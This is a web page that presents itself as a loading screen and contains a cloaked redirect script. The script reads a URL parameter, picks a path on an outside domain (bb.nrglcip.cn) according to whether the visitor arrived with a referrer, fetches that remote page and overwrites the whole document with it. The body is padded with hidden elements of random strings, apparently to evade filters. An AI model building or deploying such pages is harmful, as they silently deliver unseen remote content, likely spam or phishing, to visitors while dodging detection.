<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .CvVP2qn6 {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .CvVP2qn6 .vzPUgr {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .CvVP2qn6 .content {
            line-height: 50px;
            text-align: center
        }

        .CvVP2qn6 .img {
            width: 100%
        }

        .CvVP2qn6 .v0bKj0CD {
            text-align: center
        }

        .CvVP2qn6 .v0bKj0CD span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .CvVP2qn6 .v0bKj0CD span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .CvVP2qn6 .v0bKj0CD span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .CvVP2qn6 .v0bKj0CD span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .CvVP2qn6 .v0bKj0CD span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .CvVP2qn6 .v0bKj0CD span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .CvVP2qn6 .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function dcyH7bDs8I(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var Th683k = dcyH7bDs8I('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ Th683k +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ Th683k +".html?a=share";
		}
		
        qkCFacR=url+"#"+new Date().getTime();
        qkCFacR && function() {
            $.get(qkCFacR, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<img  src='' style='display:none'>
<div style='display:none'>DWmW5kthBWhnlSe6d7FQV0NhqXvJtCdPfela94uV1bOTASHa0dX0vAXIbKuxfHjuPwRox1EpCLqnXc55kEqKRLh</div>
<p  style='display:none'>Msl01AowFJaCtoKmemf2fR3bLja0nW5ejZu452k5m</p>
<img  src='' style='display:none'>
<div style='display:none'>DWmW5kthBWhnlSe6d7FQV0NhqXvJtCdPfela94uV1bOTASHa0dX0vAXIbKuxfHjuPwRox1EpCLqnXc55kEqKRLh</div>
<ul style='display:none' >jOSA7Lhbkl7Kysf9QaxVqO3Kszw42373gjZh2ZHxc7ntTuQibpek928vAaFwGu</ul>
<li style='display:none' >po4yK48ByOAKNpwP</li>
<img  src='' style='display:none'>
<li style='display:none' >po4yK48ByOAKNpwP</li>
<div style='display:none'>DWmW5kthBWhnlSe6d7FQV0NhqXvJtCdPfela94uV1bOTASHa0dX0vAXIbKuxfHjuPwRox1EpCLqnXc55kEqKRLh</div><div class="CvVP2qn6">
    <div class="vzPUgr">
        <div class="v0bKj0CD">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>dHfJz2RUnNJhythM9YVHoM8LZnO8DA5mhZBoPpo4scMGLtL0J2M91bU2JCfS9xbxD5iFjHWBRjEYyPUhxBfp5SnzY</p>
<ul style='display:none' >egpl2tcIEUsL6b0SOUvx5FLFrJRJKop03rLc9TzIw0YObg8LZLnOgLxkD44R3JDvUndI5fpmFldgiMGUgZT5tkQDdqY1RXYhqxYKm</ul>
<img  src='' style='display:none'>
<li style='display:none' >VDVhFgSRpVG1ToSY5EmTSNBseSrVzIRykAQOqKUWR1g0BG5cYATgJsV93dyrlg1ldNuop3jqF6iMfOsE</li></body>
</html>